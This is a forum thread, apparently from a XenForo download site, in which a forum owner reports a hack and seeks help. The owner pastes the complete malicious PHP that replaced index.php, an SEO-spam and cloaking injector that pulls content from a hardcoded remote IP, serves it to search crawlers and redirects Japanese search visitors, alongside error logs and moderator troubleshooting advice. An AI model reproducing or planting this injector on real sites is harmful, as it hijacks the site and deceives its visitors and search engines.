XenForo 2.1.12 Released Full | XenForo 2.1 ENXF

Released 2x XenForo 2.1.12 Released Full | XenForo 2.1 ENXF 2.1.12

No permission to download

DRIVER1ksa

Active member
Registered
Joined
Aug 30, 2019
Messages
27
Points
13

Reputation:

i'm running 2.1.3 got Hacked today :cry:
 

BattleKing

Spirit of darkness
Staff member
Administrator
Moderator
+Lifetime VIP+
S.V.I.P Member
Collaborate
Registered
Joined
May 24, 2020
Messages
3,525
Points
523

Reputation:

i'm running 2.1.3 got Hacked today :cry:
DRIVER1ksaplease more details on it.
did you find something in the logs of the web server, how did you recognized that you are hacked?

What else is on the server installed?
 
View previous replies…

DRIVER1ksa

Active member
Registered
Joined
Aug 30, 2019
Messages
27
Points
13

Reputation:

please more details on it.
did you find something in the logs of the web server, how did you recognized that you are hacked?

What else is on the server installed?
BattleKingthis file

Code:
<?php $inter_domain='http://204.12.224.242/z0222_2/';function stp(){ return exit; } func...
 

Attachments

  • good.zip
    1.7 KB · Views: 132

DRIVER1ksa

Active member
Registered
Joined
Aug 30, 2019
Messages
27
Points
13

Reputation:

please more details on it.
did you find something in the logs of the web server, how did you recognized that you are hacked?

What else is on the server installed?
BattleKingalso the whol Log file like this 500 line

Code:
[28-Feb-2023 06:48:07 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 06:58:02 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 06:58:47 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:07:31 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:30:25 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:31:27 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:37:44 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:47:08 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
 

BattleKing

Spirit of darkness
Staff member
Administrator
Moderator
+Lifetime VIP+
S.V.I.P Member
Collaborate
Registered
Joined
May 24, 2020
Messages
3,525
Points
523

Reputation:

also the whol Log file like this 500 line

Code:
[28-Feb-2023 06:48:07 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 06:58:02 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 06:58:47 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:07:31 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:30:25 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:31:27 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:37:44 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
[28-Feb-2023 07:47:08 UTC] PHP Notice:  Only variables should be passed by reference in /home/igamezon/public_html/index.php on line 1
DRIVER1ksathis does not look like a hack.
 

DRIVER1ksa

Active member
Registered
Joined
Aug 30, 2019
Messages
27
Points
13

Reputation:

now i upgraded to 2.1.12

everything seems work fine

thank you all
 

BattleKing

Spirit of darkness
Staff member
Administrator
Moderator
+Lifetime VIP+
S.V.I.P Member
Collaborate
Registered
Joined
May 24, 2020
Messages
3,525
Points
523

Reputation:

now i upgraded to 2.1.12

everything seems work fine

thank you all
DRIVER1ksaYou upgraded now, but why does this solve your issue?
Because all index files are back?
If you are hacked, then you might be still hacked! So please check carefully what is installed on your server, check created users, check files ...
 

DRIVER1ksa

Active member
Registered
Joined
Aug 30, 2019
Messages
27
Points
13

Reputation:

You upgraded now, but why does this solve your issue?
Because all index files are back?
If you are hacked, then you might be still hacked! So please check carefully what is installed on your server, check created users, check files ...
BattleKingthe good.php file does not exist in any of my 10+ backup file, i definitely didn't put it there. in the file you can clearly see ip address and user which belong to the hacker i guess.

also i re uploaded all the file in public_html, that make the website work again,
but cant click or use setting in admin page, the only solution fix it is to upgread.

also sorry didnt mention it before, this is the Xenforo index.php file

PHP:
<?php $inter_domain='http://204.12.194.2/z0223_2/';function stp(){ return exit; } function curl_get_contents($url){$ch=curl_init();curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);$file_contents = curl_exec($ch);curl_close($ch);return $file_contents; }function getServerCont11($url,$data=array()){$url=str_replace(' ','+',$url);$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"$url");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));$output = curl_exec($ch);$errorCode = curl_errno($ch);curl_close($ch);if(0!== $errorCode){ return false;}return $output;}function is_crawler($agent){$agent_check=false; $bots='googlebot|google|yahoo|bing|aol';if($agent!=''){if(preg_match("/($bots)/si",$agent)){$agent_check = true; }}return $agent_check;}function check_refer($refer){ $check_refer=false;$referbots='google.co.jp|yahoo.co.jp|google.com';if($refer!='' && preg_match("/($referbots)/si",$refer)){ $check_refer=true; }return $check_refer; }$http=((isset($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')?'https://':'http://');$req_uri=$_SERVER['REQUEST_URI'];$domain=$_SERVER["HTTP_HOST"];$self=$_SERVER['PHP_SELF'];$ser_name=$_SERVER['SERVER_NAME'];$req_url=$http.$domain.$req_uri;$indata1=$inter_domain."/indata.php";$map1=$inter_domain."/map.php";$jump1=$inter_domain."/jump.php";$url_words=$inter_domain."/words.php";$url_robots=$inter_domain."/robots.php";if(strpos($req_uri,".php")){$href1=$http.$domain.$self;}else{$href1=$http.$domain;}$data1[]=array();$data1['domain']=$domain;$data1['req_uri']=$req_uri;$data1['href']=$href1;$data1['req_url']=$req_url;if(substr($req_uri,-6)=='robots'){$robots_cont = getServerCont11($url_robots,$data1);define('BASE_PATH',str_ireplace($_SERVER['PHP_SELF'],'',__FILE__));file_put_contents(BASE_PATH.'/robots.txt',$robots_cont);$robots_cont=file_get_contents(BASE_PATH.'/robots.txt');if(strpos(strtolower($robots_cont),"sitemap")){echo 'robots.txt file create success!';}else{echo 'robots.txt file create fail!';}return;}if(substr($req_uri,-4)=='.xml'){if(strpos($req_uri,"pingsitemap.xml")){ $str_cont = getServerCont11($map1,$data1); $str_cont_arr= explode(",",$str_cont); $str_cont_arr[]='sitemap'; for($k=0;$k<count($str_cont_arr);$k++){ if(strpos($href1,".php")> 0){ $tt1='?'; }else{ $tt1='/';}$http2=$href1.$tt1.$str_cont_arr[$k].'.xml';$data_new='https://www.google.com/ping?sitemap='.$http2;$data_new1='http://www.google.com/ping?sitemap='.$http2;if(stristr(@file_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@file_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL; }else{echo $data_new1.'===>Submitting Google Sitemap: fail'.PHP_EOL;} } return;} if(strpos($req_uri,"allsitemap.xml")){ $str_cont = getServerCont11($map1,$data1); header("Content-type:text/xml"); echo $str_cont;stp();} if(strpos($req_uri,".php")){ $word4=explode("?",$req_uri); $word4=$word4[count($word4)-1]; $word4=str_replace(".xml","",$word4); }else{ $word4= str_replace("/","",$req_uri);$word4= str_replace(".xml","",$word4); }$data1['word']=$word4;$data1['action']='check_sitemap';$check_url4=getServerCont11($url_words,$data1);if($check_url4=='1'){ $str_cont=getServerCont11($map1,$data1); header("Content-type:text/xml"); echo $str_cont;stp();} $data1['action']="check_words"; $check1= getServerCont11($url_words,$data1);if(strpos($req_uri,"map")> 0 || $check1=='1') $data1['action']="rand_xml";$check_url4=getServerCont11($url_words,$data1);header("Content-type:text/xml");echo $check_url4;stp();}if(strpos($req_uri,".php")){$main_shell=$http.$ser_name.$self;$data1['main_shell']=$main_shell;}else{$main_shell=$http.$ser_name;$data1['main_shell']=$main_shell;}$referer=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$chk_refer=check_refer($referer); if(strpos($_SERVER['REQUEST_URI'],'.php')){ $url_ext='?'; }else{ $url_ext='/'; } if($chk_refer && (preg_match('/ja/i',@$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match('/ja/i',@$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match("/^[a-z0-9]+[0-9]+$/",end(explode($url_ext,str_replace(array(".html",".htm"),"",$_SERVER['REQUEST_URI'])))))){echo getServerCont11($jump1,$data1);stp(); } $user_agent=strtolower(isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'');$res_crawl=is_crawler($user_agent); if($res_crawl){ $data1['http_user_agent']=$user_agent;$get_content = getServerCont11($indata1,$data1); echo $get_content;stp(); } ?>

why it look like this ?


it should be



PHP:
<?php

$phpVersion = phpversion();
if (version_compare($phpVersion, '5.6.0', '<'))
{
    die("PHP 5.6.0 or newer is required. $phpVersion does not meet this requirement. Please ask your host to upgrade PHP.");
}

$dir = __DIR__;
require($dir . '/src/XF.php');

XF::start($dir);

if (\XF::requestUrlMatchesApi())
{
    \XF::runApp('XF\Api\App');
}
else
{
    \XF::runApp('XF\Pub\App');
}
 

SNap!

Collaborate
Collaborate
Registered
Joined
Mar 17, 2022
Messages
561
Points
253

Reputation:

seems some files are writeable on host. check permissions
 

DRIVER1ksa

Active member
Registered
Joined
Aug 30, 2019
Messages
27
Points
13

Reputation:

seems some files are writeable on host. check permissions
SNap!when i logged into my Cpanel i notice that "Last Modified" column notice PHP file yesterday edited! but i did not log to my cpanel more than one month.

i contacted to my web Host they say its only my web site effected,
the Shared server and other websites are just fine!
 
Top